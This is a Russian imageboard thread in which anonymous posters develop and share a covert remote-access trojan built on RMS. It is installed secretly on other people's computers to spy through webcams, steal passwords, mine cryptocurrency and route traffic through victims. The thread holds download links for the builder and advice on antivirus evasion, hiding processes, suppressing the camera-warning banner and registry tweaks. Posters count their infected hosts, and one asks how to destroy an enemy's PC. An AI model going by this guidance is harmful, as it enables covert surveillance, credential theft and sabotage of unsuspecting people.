Оставь скайп.
>>47630
Пошёл нахуй.
А сделать нужно такую штуку, что бы пришёл к "гости", зашёл в интернеты, скачал эту штучку, лучше в несколько кб и без интерфейса, запустил, а дома уже подключившись к ней начал прописываться без палева на пекарне. Устанавливать все программы, особенно ту, что умеет следить за камерой через нат.
кстати как программа ведет себя с натами vpn и прочими
>>47631
По первому пункту - что именно подразумевается под скрытностью?
По второму - если делать загрузку основных файлов по сети, то размер билда ~15-25 килобайт (.Net). Склеить с картинкой тоже можно, но формат файла так и останется .exe (RLO байт не берем, ибо аверами палится).
По третьему - она и так автоматически запускается после установки
По четвертому - RMS в такое не умеет, но, думаю, сумею запилить такую приблуду
>>47632
Зачем тебе?
>>47633
Нет ты иди. Уложиться в 15-25 килобайт без интерфейса вполне реально (если писать на .Net). RMS из коробки умеет в видео наблюдение, но в правом верхнем углу вылазит баннер, оповещающий юзера о том, что за ним подглядывают. Можно пропатчить, но нужно время.
>>47634
Умеет в обход
>>47636
Ты до сих пор на XP сидишь, где .net из коробки нет?
>>47637
Я сижу на GNU/Linux, и это не имеет никакого отношения к вопросу. А если ты посмотришь статистику, то поймёшь, что четверь хомяков до сих пор ебёт труп. http://www.liveinternet.ru/stat/ru/oses.html
>>47638
Ну что ж, попутно придется изучать плюсы, благо "C++ для чайников" валяется где-то на полке. Пока буду пилить .net версию.
Есть же на ачатах сборочка от мегавована666 на sfx, которая готовый дроппер. Ажно internet id на почту высылает.
>>47635
1. Не было значка, в процесах типа svchоst в автозапуске не было видно...
И еще как там определяется комп? если впаривать личину жертве ее можно сбрутить? или как то хомяка наити другому куну
Еще запили что бы пароли высылала на мыло
+что бы из хомяка можно было делать впн или прокси
если можно к сам клиент значки по втыкай а не каак на радмине через смд пилить
желательно что бы все делалось само
>>47644
+ к VPN. Прокси и так много чем из хомяка можно сделать
>>47644
1) После того, как ты впариваешь личинку и ее запускают, тебе на почту приходят Internet ID и пароль.
2) Софта для брутфорса я пока не видел.
3) Тут придется воспользоваться стилером. Скорее всего буду брать уфру вазонеза.
4) На счет впн не знаю, прокси можно реализовать
>>47640
Она сама Internet ID делает или там жестко задан для каждого архива?
>>47635
>Нет ты иди
Проверка на адекватность и, просто неприязнь от того что палишь всё это дело блядской школоте сородичи которой уже и так зашкварили рмс так, что его антивирусы за вирус считают. Ладно молоца братишка, проехали.
Насчёт сборочки(я так понимаю ты её собрался делать?) всё просто:
- Должна быть програмулина умеющая при запуске прописываться на пекарне, обходить защиту и ждать связи с ней, умеющая в обход нат и грузить нужные тебе для запуска файлы по ссылке, после запускать их, ну наверно умеющая в телнет. Что бы закинул её жертве при личной встрече без палева и ушёл довольный домой овладевать её пекарней.
- Хикачую прокси, что бы нашёл скоростного хомяка, поставил ему прокси и понеслась по не назначению скрывать свой анус, так же нужно что бы обходила нат, так как всё анально уходить за него.
- Сосачую изменение названия процесса в диспетчере задач и отключение всплывающего баннера о видео наблюдении, ну или лучше установить свою софтину так же умеющую в нат. Например как это сделал странжлов вытащив кишки из webcamxp.
- Устойчивость и непалевность програмулины из первого пункта, что бы если что можно было опять к ней законектиться и заново установить весь софт.
Давай братишка, действуй, верим, надеемся, помним.
Братишки, чей пик? Ты ещё живой? Что со всеми пекарнями?
>>47653
1) RMS же из коробки многое умеет, зачем пилить велосипед?
2) Прокси будет
3) Вчера на руборде нашел патч для сервера версии 5.4, отключающий баннер о видео наблюдении. Над сменой названия процесса надо подумать
4) Если программу запускают из-под админа, после следующей перезагрузки rfuserver.exe уже запускается с системными привилегиями, так что просто так хлопнуть его не получится.
На пикче - хосты, которые до сих пор живы (прогруз был в конце мая).
>>47652
Сама новый генерит. Вроде бы, в рмсе есть ручка для этого: письма приходят с сервера тектонита.
>>47654
Лол это твоя пикча что ли?
Суть в том что я часто попадаю в рандомные дома и имею доступ к пекарне, нужно что то, что бы немного весило и только давало доступ на пекарню извне, скачал по сссылочке, запустил и считай у тебя есть окно на пекарню, ну а потом уже из дома под анальной защитой прокси начинаем овладевать перканей и прописываться на неё захватывая все необходимые функции, что бы без палева типа пекарня стала странно себя вести сразу же после твоего ухода. Таскать с собой 5 мегабайтный файл на флешечке оче палевно.
Ну и конечно нужно что то, помогающее овладевать через интернеты, закинул человеку накрутку лайков в вк, поставил ему бекдор.
>>47657
В соседнем треаде жи есть ультрастелс ультракомпакт троян снежок.
Сделал загрузчик для самого RMS, начинаю тестировать. Размер ~14 килобайт.
>>47632
Удваиваю, оставь скайпик, могу помочь с тестированием.
>>47653
>что бы обходила нат
Ты же понимаешь, что без стороннего сервера это сделать не очень просто?
>>47671
Почитай на сайте RMS. Если клиент не может достучаться до сервера напоямую, то сервер либо делает бэкконнект, либо соединение идет через сервер TektonIT
Как с 7, vista, 8 к нему относиться?
Еще предлагаю узнать порт написать эксплоит и ебашить
>>47682
5650/tcp, сплоет с тебя.
Алсо, анон подкинул мыслю: запилить btc/ltc майнинг. На данный момент готов ужатый пакет с Ufasoft Miner 0.72 (вес ~904 килобайта). Основной модуль для загрузки RMS пока что проходит тестирование.
>>47661
Тесты прогнал, баги пофиксил. Приступаю к написанию самого Builder'а.
На словах - ЛЕВ ТОЛСТОЙ, на деле - ХУЙ ПРОСТОЙ
НУ И ГДЕ НАХУЙ?
Оказался таким же пидорасом как странжхуй, маму их в рот ебал.
Сап тред. Извиняюсь за задержку, свободного времени на неделе не было. Завтра постараюсь доделать билдер и пару фич по-мелочи. А пока - интерфейс альфа версии.
Закончил пилить личинку и билдер. Доделываю небольшой мануал и вбрасываю сюда.
Готово. Я думаю, не стоит объяснять, почему размер билдера такой большой?
http://rghost.ru/49044515
В следующей версии планируется переход на последнюю версию сервера, а еще изменение интерфейса билдера (это в дополнение к тому, что есть в TODO)
>ToDo/Fix
>Смена лицензии
Надеюсь, на свободную? Если да, то ты охуенный.
>>47787
Ты не так понял. В данный момент используется один лицензионный ключ, который зареган на мою фейкопочту. Шансы, что его забанят очень велики и именно поэтому я и хочу запилить возможность смены лицензии. Получить бесплатный ключ можно через Viewer, там даже почту не проверяют
>>47788
Вот оно как. А я хотел узнать, собираешься ли ты открывать код своего творения.
>>47789
Там много быдлокода. После выхода нормальной версии (с полным функционалом)выложу сорцы бетки
Сап тред. Файл на рыгохосте потерли, сегодня перезалью
>>47822
Перезалил. http://rghost.ru/49123908
По поводу разработки и фиксов: все, скорее всего, будет делаться в выходные, ибо учеба и банальная лень.
>>47630
выложи сорцы клиента, я мб перепишу на mono под линух и макинтош
Никто еще не грузил? У меня уже отстучали 4 пеки
А и правда скинь, собрать кроссплатформ я смогу. Есть пара задумок.
пароль?
Как распространяете?
>>47854
Няша, подскажи, куда заливал файлы? На какой хостинг?
>>47883
Обычно юзаю хостингер, ибо удобно и бесплатно. Алсо, стоит ли запиливать поддержку скачивания файлов по FTP?
>>47884
А разве в рмс нет файлового менеджера?
или ты имеешь в виду файлы для установки самой рмс на хомяка?
И да, выложите по возможности количество улова (+ операционки). Есть подозрения, что личинка фигово работает на шин 8.
>>47887
А, кстати, насчет файлов для установки. Как твое издели качает их? Сразу целую папку upload или просто нужно указывать путь до папки на хостинге, в которой просто лежат все файлы для установки?
Троян на .net, охуительные истории. Вирусописатели уровня /i/.
>>47686
> Ufasoft Miner 0.72 (вес ~904 килобайта)
1. Говно;
2. Жирное говно.
>>47630
Суля по .NET Reactor-у, исходники ты выкладывать не собираешься.
Да?
>>47889
Почему бы и нет? Писал же, что кресты в процессе изучения.
По поводу майнинга - посоветуй что-нибудь годное тогда, cgminer вообще 4 метра будет весить после упаковки.
>>47890
Сорцы будут позже, reactor'ом прошелся для того, чтобы от аверов скрыть и чтобы всякие с рефлектором обламывались.
>>47888
Из upload копируй файлы в папку на хостинге, которую при сборке указал.
Перезалил. http://rghost.ru/49204295
>>47886
Ебать вы котятки, ничему не учитесь. Достаточно первому крыса-куну спалить тред и все аккаунты на таких ящичках с десятками «новых Internet-ID» будут банить.
По крайней мере, я бы так сделал на месте админов RMS.
>>47897
Максимум, что смогут сделать админы RMS - забанить ключ, но сменить его - дело двух минут.
>>47897
Ебать ты лолка, зачем, по-твоему, они вообще эту авторегисрацию прикрутили?
Интерфейс новой версии. Что изменить/добавить/убрать?
>>47900
Сделай все интуитивно понятным или добавь подписи, или убери свой гуй вообще. А лучше — сделай веб-сервис.
>>47906
С веб-сервисом годная идея, да. Стоит ли показывать пояснение к кнопке в заголовке окна?
>>47906
При наведении курсора на кнопку в заголовке показывается, для чего она нужна. Плюс убрал края. Так лучше?
Оп, а ты не зашил, случаем, стучалку еще и на свой ящик? Тебе ж выгодно это.
>>47914
>как будто специально для набигаторов
Ну вряд ли из альтруизма они столько траффика через себя пропускают.
Опчик выручай. Почему не получается авторизоваться на хомяке? Циклится как бы авторизация: просит пароль, думает, потом опять просит.
>>47931
С той же самой проблемой борюсь. Есть подозрения, что хомяк успел скачать еще одну личинку и она затерла твои данные.
>>47933
Мне запустить на нем еще раз, что-ли? Два раза ходить так в гости как-то не вариант, лол.
>>47935
Попробуй этот же билд на виртуалке проверить. Если будет та же фигня, то напиши мне в скайп.
sych.erohin
Надоело уже перезаливы делать. http://rghost.ru/private/49249245/46ea95cdfe954aeae810abfe8ebdfb04
Может сделать небольшую страницу личинки на бесплатном хостинге?
>>47933
Скорее, уже стояла старая. Пароли от старых РМС в реестре имеют больший приоритет, чем пароли от новых, так что надо затирать ветку при установке.
>>47940
Странно. Учтем, спасибо за подсказку. Алсо, где в реестре прописывался RMS, начиная с 4.3?
>>47943
Там же, hlkm\system\remote хуё моё. Поле пароля раньше называлось 'Pwd', теперь 'Password', поэтому не затирается при установке, а РМС использует 'Pwd', если такое есть.
>>47955
Потому что в торе заблочат с ещё меньшей вероятностью, чем на бесплатном хостинге. Если быть точнее, почти с нулевой вероятностью.
Тебе так сложно в исходниках выкладывать свое ПО, опчик? Да даже если ты до такого способа не можешь додуматься — "Разрешённые типы файлов: 7Z, GIF, JPG, PNG, RAR, TXT, ZIP". Охуенные вы проблемы находите.
>>47957
Смотри ограничение на размер файла. Билдер с файлами личинки весят ~5.6 мегабайт.
>>47958
1. Многовато у тебя говна. Что за говно там внутри? Уверен, что часть можно загружать из интернета.
2. Мы уже разучились делить архив на кусочки? Еще скажи, что ты дискет не застал.
>>47960
1. Файлы личинки для сборки. Можно почти все загружать, да, но пока что нет времени ебаться с загрузкой.
2. Нет, не разучились. В следующий раз так и сделаю. Дискеты застал, до сих пор где-то лежат в ящике
Исходники когда откроешь? Или там сюрприз?
Перезалей снова
>>47994
Без пруфов просто уёбывай. С «пруфами» в виде высеров журнашлюх уёбывай не просто, а немедленно.
>>48015
сенкс бро, тебе в скайп стучать можно? (с тупыми вопросами от гуманитария не могущего в интернеты)
реквестрирую способ зашить личинку в жпег/мп3 например
>>47950
Блять посоны, что не так, хуле не удаляет?
Аноны, я тут подумал: может ну его нахер этот YOBA интерфейс?
>>48054
Давай я тебе с этим всем помогу и ты станешь меньше заморачиваться.
Прошу прощения за нубский вопрос, но у жертвы должен быть внешний ип и не должно быть роутера, я правильно понимаю?
>>48068
Извиняюсь, прослоупочил. http://www.filedropper.com/001_10
Да, в этот раз залил на другой файлообменник, заебал этот rghost. Опять же не получилось залить пикчей ввиду криворукости
wgfwagwa waGwaGwaG
-------------------------------------------h srehseh
Криптуйте, суки. Вас же уже половина антивирусов узнает. Ну что вы за уебки. Нет, блять нужно делиться с аноном, чтобы все пошло по пизде.
>>48074
Ты предлагаешь пилить превад для одного человека?
Посоны, собрал как в этом видео http://www.youtube.com/watch?v=rGTAClsxkQ0
(не было ссылки когда собирал). На виртуальной машине все збс, когда кидаю кому нибудь либо пишет отказано в доступе, либо не приходит письмо. Один раз пришло, но подключиться не могу. Как чинить не подскажете?
>>48076
Возможно проблема в том, что для работы с реестром требуются админские права (начиная с висты).
>>48077
А если письмо пришло ,только нихера не выходит подключиться - это почему может быть? Не из за админских прав же.
>>48079
Если пишет "Не в сети", то: либо сам хост оффлайн, либо выключен RMS.
Завтра выложу обновленный билдер. Список изменений:
*RMS обновлен до версии 5.5.3
*Личинка была заново переписана
Хотелось бы заметить относительно рмс.
Все соединения проходят через их сервер, если что все логи как сервера, так и клиента будут у них. Весьма вероятно, что даже если свой сервер ретранслятор поднять, то он может какую техническую информацию отправить на главный сервер.
Поэтому не стоит поднимать ботнеты на рмс, как бы он не был удобен.
Посоны, подскажите, какими антивирями эта сборка ТОЧНО не палится? Очень надо.
>>48081
>*Личинка была заново переписана
Пора уже делать из этого фичу.
Посоны, я понимаю ,что вы тут обсуждаете данную сборку, но так как я рукожопый, она у меня нихуя не работает. Не буду ебать вам мозг по этому поводу, и спрошу про ту, которая у меня заработала, опять же вот эта http://www.youtube.com/watch?v=rGTAClsxkQ0
Но у нее есть одна ссаная проблема, если запустить этот рмс еще раз на той же машине рмсу наступает пиздец. А так как при его запуске нихуя не происходит, то хомячок начинает бешено хуярить по этому экзешнику. Есть идеи как можно решить эту проблему? Ну, хотя бы как заставить его нахуй удаляться после запуска. Палевно, конечно, но уж лучше так. Заранее спасибо.
>>48088
делай склейку, или хуярь фейко окно с "загрузкой"
Посоны, в этой сборочке появляется ебаный банер при включении камеры. А то просто пиздец. В том видео что я до этого кидал >>48088 есть такая фича, которая убирает банер. РМС-кун, может прикрутишь?
>>48104
Правда я так нихуя и не понял как он это делает, а он толком и не объясняет, сука.
>>48105
Кладёт dll к рмс-у, которую тот подгружает, которая прячет окно баннера. Только эту dll ав палят пиздецки.
>>48106
В той сборке палится install.cmd вообще всеми антивирусами. Насчет длл хз. А можно ее как нибудь прикрутить к уже установленному рмсу?
>>48107
Можно - просто положить в ту же директорию, но она только со старыми версиями работает. К 5.4 и выше, вроде, не было такой в паблике.
Белорус, ты тут?
После запуска личинка висит в процесах и нихера не делает.
ЧЯДНТ? Права на папку, откуда скачивать, указывать нужно или по дефолту? (поставил 777)
Ключ 20-ти символьный. Может многовато?
Ну а хостинг и почта ок. В чём же проблема?
Посоны, расскажите как вы впариваете архив жертвам? Меня везде посылают нахуй
>>48358
А не, все ок, просто так долго ставило. Потом аж 2 письма пришло, лол.
Чем записывать видео через удаленную камеру RMS? Все программы выдают черный экран.
ОП, оставь жаббер свой. Помогу с тестом.
>>48370
В версии 5.5 вырезали это возможность И через в прошлых версиях честно сказать хуево записывалось. Грузило хомяка под 99% и из 10 минут записи ролик всего на 2-3 минуты.
>>48371
Или отключи оверлей нахрен (в виртуалке, например), и пиши чем угодно.
Пасаны, какие признаки бана ключа? Хуйле у меня пишет НЕ ВСЕТИ почти все пекарни, что можно сделать? Из 11 работают 2, хуйле ему надо? Как часто меняете ключи и какой у них предел?
ОП снова в треде, времени на кодинг (да и вообще на интернеты) не было.
>>48411
У меня из 70+ хостов онлайн регулярно 10-30 (в зависимости от времени суток), так что это нормально. Иногда попадаются отчеты с именем компьютера типа PC6 - это аверы, можно сразу удалять такие письма. По ключам - если ключ банят, то при подключении к хосту вроде как должно выходить уведомление (на стороне Viewer'а).
>>48413
70+ на одном ключе?
А что будет, если регулярно выходят 2 пека с 1 айди? Будут недоступны пока один из них не выйдет?
>>48415
>70+ на одном ключе?
С учетом того, что я делал заливы обычной личинки, то на одном ключе висит уже ощутимо больше 70 хостов.
>Будут недоступны пока один из них не выйдет?
Да, доступа не будет, пока один не отключится.
>>48416
Может сегодня проблемы с серваком? На официальном форуме 1 сообщение видел что по айди не работает, у тебя сколько щас откликается?
>>48418
Братишка, смотрю ты адекватный. В общем то тут для хорошего овладевания пекой нужно как мне кажется следущее
- айпи отсылалку на почту и/или хостинг по выбору
- запасной ход на пека в случаи удаления сборки по айпи и через нат
- софтина для просмотра камеры по айпи и через нат
Как всё это заставить работать за натом, хуй знает, знал бы давно сделал сам, всё это нужно на паре работающее с рмс, а не заменять это всё сборкой рмс, так как откажет одно, всегда будет запасное, возможно даже ставить ещё 1 раз, так как рмс иногда работает как говно, что легче сделать через тот же радмин, но опять же нат.
Тоже пойду спать, уже не соображаю
Ананасы, удалось кому под вайном их интернет-ид сервер запустить? Что-то не коннектит никак спермоблядское глюкалово.
Посуны вопрос не по темехотя как посмотреть, а как фейк вбыдле сделать без номера телефона? Как щас делают тру посоны?
sms-reg.com деньги просит - значит нахуй, деанон же
>>48421
Попробуй доустановить msxml и gdi+, может сработает.
>>48425
Да оно запускается, не в либах дело. Но показывает клиентов битыми символами (локаль не помогает), и не коннектит к ним.
>>48427
В вайне поновее само завелось. Только все равно автологона нет, вот же пидары ленивые Спасибо, анон.
>>48430
Только даже "сервис" не стартует без иксов, такое вот спермоблядство. xvfb ещё заводить ради такой хуйни.
Посоны, что бы не палиться, для просмотра камеры хочу поставить ремкам, но блять, у всех пошёл IPv6-адрес, как к нему подключаться? И какой лучше софтиной подключаться к камере?
>>48432
Совсем ipv4 отключили? Это ж ебануться, где такой прогресс?
>>48432
>у всех пошёл IPv6-адрес
Гонишь небось, не может такого быть.
>как к нему подключаться
Отвечает К.О.: по IP-адресу.
>какой лучше софтиной подключаться
Той же, которой и до этого.
Братишки, ну понимаете пишу в консоли рмс ipconfig, а он мне в ответ локальный айпи хомяка и его айпи 6, и что блять мне делать, получается что хомяк мало того что за натом, так ещё и с айпи 6, как можно всё это дело пробросить? Есть у кого инфа как может хамачи скрытый поставить? Что бы скрытно и с первого раза, а потом уже по хамачи хуярить
Прогресс я так понял в Белорусии, изображение рабочего стола обновляется раз в 5 секунд, охуенно такое слайдшоу, у них там диал ап что ли
ёбананахуй пидоры ебанные, при отправке сообщения пишет покупайте паскоды, охуели нахуй
Сделал скриншот пока сообщение отправлялось
Ёбанный стыд, больше часа отправлял сообщение
>>48441-хуй
>>48441
А у тебя-то есть ipv6, чтоб на его teredo ходить? Да и работает оно через раз и через жопу, это тередо.
Посоны, а чем можно собрать пароли на компе жертвы? от нирсофта программы генерят пустой текстовый файл. Нужны пароли из хрома.
Посоны, накидайте способов как уничтожить выключить аваст, нашёл голодных шлюх, аваст блочит просмотр экрана и камеру, нужно его усмирить
>>48446
Никак, аваст последнее время че-то совсем ахуел, нужно найти их офис и сжечь нахуй!
Посоны, бля, поставил ноуайпи, поставил рмс, поставл комету, настриваиваю и нихуя, никакого отстука от обратного соединения, брендмауэр выключил, проворачиваю всё дело на виртуалке, что не так? Что может быть? Полнейшая тишина.
Кстати, есть один момент, весь трафик пропускается через проксификатор, не хочу палить свой айпи в этой адской лаборатории.
Похуй вырубил проксификатор, та же хуйня, пробовал прямой айпи виртуалки 10.0.2.15 т 127.0.0.1, нихуя
>>48466
>пробовал прямой айпи виртуалки 10.0.2.15 т 127.0.0.
Почему-то мне казалось, что я ответил на этот пост.
Надеюсь, ты изнутри виртуалки пробовал? Потому что снаружи никаких 10.0.2.15 и, тем более, 127.0.0.1 не видно, учи матчасть.
>>48490
Конечно изнутри, зачем мне на вылизанную винду ставить всякое говно. Вообще тишина.
>>48491
Года 4 назад брал RMS и паковал в SFX. Сейчас нашел эти файлы там есть файл реестра для RMS в нем hex пароля сервера, как его расшифровать?
И есть ли годный способ слепить файлы?
посоны, вбросьте свежую версию позязя
>>48493
http://rghost.ru/49930050
Последнее, что есть.
Посуны, чем можно захватить камеру что бы не патчить RMS и не вызывать бугурт у антивирусов? А ещё надо что бы через NAT работало, хуй знает, всё стало избавляться от белых айпи.
http://rghost.ru/private/49936982/1992763de3af8e09155e03f3a6b1d268 - старая версия (0.1B)
Если запустили файл из >>48512, то срочно обновляйте свой аваст и делайте полную проверку системы.
>Малварь долбится на 78.132.244.147:1337. Если 78.132.244.147 в сети, то малварь шлет пароли от бразуеров и нажатия клавиш. Есть подозрения, что еще и фунцкионал RAT'а заложен.
>>48521
Что «это»? Я про исходный код оповского билдера, который давно можно было открыть, и обновлять на каком-нибудь гитхабе, одновременно выкладывая сборку в тред.
>>48519
Братишка, можешь вот это настроить/прикрутить/выложить отдельно? Так, что бы не пришлось на глазах у хомяка, лезть в нему в настройки модема и что-то там делать, что бы мммаксимум скрытно, буду писать вкусные камеры.
>>48530
Что конкретно настроить/прикрутить/выложить отдельно? Если честно, я нихуя не понял из твоего сообщения.
>>48549
И если при запуске у клиента ещё нет интернета, то plink дёрнется и умрёт. Охуительная идея!
>>48552
>я не придумал ничего умнее тупого запуска plink.exe
Ясно.
>>48554
Если дохуя умный, расскажи ещё, как в opensshd запретить клиенту всё кроме пробрасывания локального порта.
Посуны, а если и я и хомяк за анальными владениями NAT? Как блять я то порт проброшу? Схожу к провайдеру и посмотрю что у них там за аппарат стоит?
>>48557
Где-то я слышал про специальный restricted shell который пишется в /etc/passwd вместо /bin/bash, но сам его не ковырял. Ну и понятное дело, нужно запретить всякие scp.
Готового решения не имею, гуглируй.
>>48564
>Как блять я то порт проброшу?
https://www.google.com/search?q=ssh+проброс+портов
>>48565
Хватит мне своём линупское говно под нос совать сука.
>>48567
ssh — кросплатформенный протокол, причём с довольно неплохой реализацией под ПитухОС™. Так что остынь и начни наконец-то пользоваться качественным ПО.
>>48565
scp/sftp запретить не всем эккаунтам, а одному конкретному, ты, надо полагать, тоже не знаешь, как. И проброс только локальных портов, но не серверных на клиента.
>>48568
Это отличный протокол для терминалов, для всего остального говно это, а не протокол.
>>48571
Ну тогда уж discardable виртуалку стоит завести, но на неё нужен отдельный ip. И всё это ради убогого форвардинга портов, который даже не может в DF бит, то есть, с RDP облом. Цепочка socat-ов это делает гораздо прямее и безопаснее, в общем.
Братья, а кто-нибудь тут вот эту
http://www.ammyy.com/ru/index.html
пробовал? Вроде бесплатная.
>>48572
>не может в DF бит, то есть, с RDP облом
Ёбаный стыд, я и не знал про такой фейл RDP.
>Цепочка socat-ов
Тогда уже сразу тор запускай, хуле. Всё равно скорость никудышняя будет.
>>48578
У socat-а вся работа - копай отсюда, кидай туда. Со скоростью, то есть, проблем нет.
>>48581
Так ты же цепочку предложил, по скорости это то же самое, что тор.
Оп все норм, только можешь допилить билдер чтоб поддерживались пути типа %windir% %temp% и тд?
Пикрилейтед, личинка создает папку на рабочем столе, нужно чтоб билдер понимал такие пути до папки с шиндовс, можно как-нибудь пофиксить это?
>>48592
Поюзал сейчас на виртуалбоксе, странно личинка файлы не скачивает, заканнектится не получается, но письмо на почту с ID и паролем приходит.
Пикрилейтед, чет я не пойму почему личинка не качает с локалхоста файлы?
Посоны, есть одна мразь, с явно пробитым хуём мозгом, нужно уничтожить его пекарню, подскажите что запустить и сделать, что бы пекарню хасхуярило просто в хлам и он больше не появлялся в сети, такие люди ненужны нашему обществу.
Ясно дело вишмастер, но можно ещё советом интересных как уничтожить пекарню на уровне железа имея доступ только по рмс.
Репост с зк, может поможет кто.
Пишет кто на wpf mvvc?
Если я напишу ViewModel.Model.MostRareWords() из моего view на event? ViewModel это instance - будет считаться за быдлокод?
Доходит до смешного, я из MainWindow (главное окно с верхним меню), по средствам OpenFileDialog передаю путь до файла во View (ставлю Content у ContentControl в MainWindow, в констуктор пихаю путь), из которого он идет дальше во ViewModel, и потом наконец в Model в которой он и нужен.
Получается MainWindow->View->ModelView->Model, в трех конструкторах успеваем побывать.
В общем, пока двощ лежал, я успел поднять маленький сайтец http://rmsbuilder.url.ph/ (зеркало - http://rmsbuilder.sourceforge.net/). Апдейт на подходе.
>>48593
Скинь личинку и логи апача мне [email protected]
>>48609
Пошамань с обновлениями для BIOS'а, либо с разгоном.
>>48610
Анон, иногда строка - это просто строка, не страдай хуйнёй, делай как удобней.
>>48675
С обычным фтп тоже не взлетело хз в чем дело.
Может личинка опа не умет в NAT? Сижу за роутером и натом провайдера. Походу в этом дело.
Ладно мне пока сноуболла хватает, буду на нем сидеть а там посмотрю че еще поюзать.
>>48676
С фтп и не должно было взлететь, пока в процессе. Логи и личинку еще изучаю.
Какими командами знаменитый strangelove.cmd создавал пользователя для rdp у хомяка? Терминал от RMS не может правильно отобразить СЛ, решил ручками создать, а кроме net user ничего не знаю, и боюсь напортачить и привлечь внимание. Помогайте, анончики
ОП снова с вами, котаны. Меня тут собираются отчислить из уч. заведения, поэтому разработку возобновлю в понедельник-вторник (если отчислят). Ну а если мне повезет и меня не отчислят, то личинка так и останется бетой до нового года. Вот такие новости.
Посоны, чё за хуйня? При запуске вьювера, переустановка не помогла
Посоны, помогите написать личинку, которая в скрытом и автоматическом режиме будет майнить лайткоины на указанной мощности, что бы быстро не запалили.
>>48878
Берешь любой майнер и шаманишь с агрессивностью/количеством потоков, ищешь любой p2p пул (syari.net, например), делаешь сборку - PROFIT.
>>48873
Вьювер последней версии? Попробуй запускать не на виртуалке.
Может кто своей сборочкой на чистом бат и вбс поделиться? Для ознакомления, что бы не забивать голову лишним, и так занята
>>48884>>48885
Недавно было вот такое >>48713 http://pastebin.com/CFz3z14P
Или ты хочешь именно майнер на VBS?
Посоны, я 2.5 раза прочитал тред и все равно не понял, как вы ломаете пеки. Составьте гайд, что ли. Последний раз подобным занимался 2 года назад во время радмин-набегов.
>>48912
> 2.5 раза прочитал тред и все равно не понял, как вы ломаете пеки
А может тебе оно и не надо, а? На свете есть много чего интересного, это ведь явно не твоё, ну если до сих пор не додумался. Ну открою я тебе секрет, а дальше что? Подобных этой головоломок на твоём пути будет масса. Как и обещал, открываю секрет.
Впаривают билдер путём рассылок по емейл
>>48914
> А может тебе оно и не надо, а?
Ну нет, мне оно оче надо.
> На свете есть много чего интересного, это ведь явно не твоё, ну если до сих пор не додумался
Хотя нет, вобщих чертах понял. Не понял только того, что за URL надо указывать в билдере? А после создания личинки что делать? Закидывать ее кому то на пк? Или у него принцип действия как у радмина и он брутит ip?
Посоны, есть ID пека, пека точно в онлайне, но пишет что это не так, что делать?
>>48953
И вообще не к одному пека не подключалось, даже к своему.
>>48955
Двачую посоны, сделайте такое говно что бы просто закинуть через рмс и получать профит с этого бесполезного говна в видео хомяков
>>48953
>что делать?
Наконец-то освоить качественные инструменты вместо проприетрных стукачиков?
>>48973
Какой? Какие пакеты? Какой дистрибутив? Научи уж, раз так.
>>48980
Ну запили нам сборку SSH в связке Клиент+Сервер нормальную, плюс серверную часть с быстрой, скрытой установкой и так, что бы она отстукивала свои координаты, IP и прочее на почту@сервер. Плюс не забывай, некоторые за роутером и если у них динамический IP плюс роутер, то всё это становится хуитой. Тут нужно придумать ещё серверную часть, как типо у RMS с их ID. И сервер такой, что бы желательно не на твоей пеке, а на бесплатном хостинге, потому что у многих у самих стоит роутер, который не поддерживает такие приблуды вроде NO-IP.
>>49011
Ну где ты видел, чтоб пиздабол мог что-то запилить?
Ваш рмс уммет в обход антивирей? В скрытый режим работы? В склейку с жпег/мп3?
>>49015
> В склейку с жпег/мп3
Может.
> обход антивирей
пока проблема с этим
>>49011
>запили нам ~ серверную часть
То есть, свой сервер дать? Или тебя научить пользоваться sshd?
>некоторые за роутером и если у них динамический IP плюс роутер, то всё это становится хуитой
Нет, на это вообще похуй, я об этом и написал: «Оба решения обходят nat», как reverse ssh, так и tor hidden service. На запуск последнего у стандартного файрволла шишка дымится, правда.
>нужно придумать ещё серверную часть
Понятно, вопрос по первой цитате отменяется. Моё решение не для нищенок, не способных выделить $2 в месяц на самые дешёвый VPS и не для тупых, не способных нагуглить, что такое ssh и tor.
>>49013
Ты выбрал лучший способ отказаться от моей помощи.
>>49017
Ну если ты теперь наконец съебёшь, то отличный способ например. А то все сугубо шиндовые треды в ш затопил своими прыщевысерами.
>>49019
>ты теперь наконец съебёшь
Это было бы слишком большим подарком.
>прыщевысерами
Я предлагал только кроссплатформенное ПО. Кто же виноват, что спермодети могут только в кнопочки?
>>49020
Сам-то чем лучше спермодетей? Ну поехал ты на швабодке - так напиши дроппер для своего плинка, конфиг сервера безопасный собери, чтоб хомяк не проник, поделись с братишками. Пиздеть-то - не мешки ворочать.
>>49021
>Пиздеть-то - не мешки ворочать.
А то. Самому понадобится — соберу, а так пока дел других дохуя (помимо пиздежа в /i/, конечно).
>>49032
Что давать? Нет у меня майнера на VBS, я же не ебанутый какой-то.
http://www.hackforums.net/showthread.php?tid=3742715&
Туториал для тихого майнера, кому надо.
>>49048
Серверную часть для этой >>48909 запускалки майнера? За тебя написать скрипт, который по запросу http://example.com/params.php?key=121212 отдаёт параметры майнера? Это настолько простая вещь, что я даже его не сохранил и он проебался вместе с проёбаным сервером.
>>49051
>[403 Forbidden Error] - You might be blocked by your IP, Country, or ISP. You can try to contact us at http://www.witza.com/contact.php
Ясно.
Короче сидел я, скачивал голых тетек с ютуба, как вдруг моя мыш начала открывать и закрывать вкладки, потом зашла в ВК и открыла "Поддержку", намекая тем самым.
Потом я все таки удалил в диспетчере задач "RMS" и все прошло.
Но все же, как понять что произошло?
Кто мог получить доступ к компьютеру?
>>49069
смотрю. нихуя не понял
>>49071
он был вырублен 2 недели назад. Тогда же и убрал галочку доступа к компу.
Именно тогда и произошел случай
>>49072
Значит того, кто рулил твоим компом, уже не найти. Ведение логов в скрытой версии отключено.
>>49073
а без галочки к компу доступ не получат уже 100%
>>49075
а как могли получить доступ? что могли спиздить?
>>49076
Спиздить могли все что угодно. Файлы RMS все еще на месте? Если да, то смотри дату создания и ищи созданные/измененные в тот день файлы. Про заражение точно ничего сказать не могу, но если найдешь личинку, то можешь скинуть ее на [email protected], попробуем разобраться.
>>49077
что за файлы РМС? Как найти из и как искать созданные в тот день.
Подробнее плиз
>>49078
Ищи файлы rfusclient.exe/rutserv.exe и смотри дату их создания. Поискать можно штатными средствами системы, либо через Total Commander (если установлен).
>>49085
оба созданы в 12 году, открывались 14 сентября
>>49086
Хм, интересно. По возможности добавь в скайп sych.erohin, не будем засирать тред.
>>49051
Ой бля. Ты еще ачатовскую ссыль вбрось.
А лучше xakep.ru блять
>>49106
Он >>49102 не ОП. Пиши на почту [email protected]
>>49109
ты ебанутый? Это меня радминили, и я говорил про паленый вк
